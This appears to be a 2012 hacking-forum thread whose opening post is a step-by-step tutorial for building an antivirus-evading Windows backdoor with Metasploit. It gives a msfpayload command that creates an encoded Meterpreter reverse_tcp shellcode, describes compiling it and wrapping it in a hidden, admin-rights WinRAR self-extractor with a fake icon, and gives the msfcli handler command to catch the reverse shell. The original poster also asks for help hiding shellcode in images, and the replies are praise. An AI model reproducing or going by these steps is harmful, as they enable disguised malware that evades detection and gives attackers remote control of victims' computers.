Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] filter_list
Author
Message
[TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] #1
Hello all,

I would like to create a topic reference regarding the antivirus evasion in any form whatsoever coupled of course with Metasploit.

To structure this subject I would ask you to follow this format:

Operating systems used
operating systems vulnerable
Required software (if any)
Antivirus evasion method (ideally with a link to a tutorial or a video)
A link to an analysis of https://www.virustotal.com/ the same day.

I would start it myself with a method which gives an executable with between 2 and 4 viruses detected randomly


Operating systems used:

backtrack 5R1
Windows XP sp3

Operating systems vulnerable :

Windows 7 and Xp Any Versions

Software requirements:

Dev-C + + Version 4.9.9.2 (in XP)
Winrar Version 4.10
The Source Shellcode of This Video

Here is the method I present to you but I am not the author of this video
First you need to create the shellcode base with this command:

Code:
msfpayload windows/Meterpreter/reverse_tcp LHOST=192.168.1.97 LPORT=3333 R | msfencode -e x86/shikata_ga_nai -t c -a x86 -b "\x00\x0a\x0d" -c 5

It shows that:


Spoiler:
[Image: shellcode2.png]



Then paste the shellcode at this point in the shell_part1 in Dev-C + + :


Spoiler:
[Image: devc1.png]
By n0bul4r at 2012-05-01



And compil :


Spoiler:
[Image: devc2.png]



Then open the command prompt: execute => cmd and insert the contents of shell_part1.exe inside a text file :

Code:
C:\..\User\Desktop\shell_part1.exe > shell.txt

Then open the text file and copy its contents to shell_final.cpp and compil


Spoiler:
[Image: pastecoden.png]




Rename and select the file out and create an archive with Winrar sfx


Spoiler:
[Image: coolstuff2.png]



Click on Advanced tab and move on sfx options right then check the admin rights, add an icon, check hide all and give the file to launch


Spoiler:
[Image: sfxoption6.png]



Analyze.
And Test with :


Code:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.97 LPORT=3333 AutoRunScript=' migrate -f' E


Spoiler:
[Image: testpayload.png]


And Enjoy

PS:
I am looking to inject shellcode in an image, if you have any leads for me I'll be happy.
I have a few tracks here and there but I do not know how to proceed step by step.

Reply

RE: [TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] #2
This thread really cool bro, i like a backtrack thread maker here. When ur thread complete 5 day of posting then u PM me ur thread link because i want to ADD this thread on "Thread Market" but first read rule carefully.

1010011001111010010010101
0110G10H10O101S010T10101
1010100010100100101001001



Reply

RE: [TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] #3
Hi,
Thanks for reply.
If i understand, I must send you a private message in 5 days including this format:
Thread Name:-------------
Thread Link:---------------
Thread Author:------------
Author Profile Link:--------
To my Tut is put in the best forum

I specified that this is my work, I did exactly the same on another forum with the same username and the same email address.

I will post now, three other TuT, which I think its the same quality

Reply

RE: [TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] #4
(05-01-2012, 08:09 PM)Pixo Wrote: Hi,
Thanks for reply.
If i understand, I must send you a private message in 5 days including this format:
Thread Name:-------------
Thread Link:---------------
Thread Author:------------
Author Profile Link:--------
To my Tut is put in the best forum

I specified that this is my work, I did exactly the same on another forum with the same username and the same email address.

I will post now, three other TuT, which I think its the same quality

Welcome ,i m waiting for 5 coming day......Yawn

1010011001111010010010101
0110G10H10O101S010T10101
1010100010100100101001001



Reply

RE: [TuT]☆All Methods Of Evasion Antivirus With Metasploit☆[TuT] #5
Nice tutorial bro.
Thanks a lot

Reply







Users browsing this thread: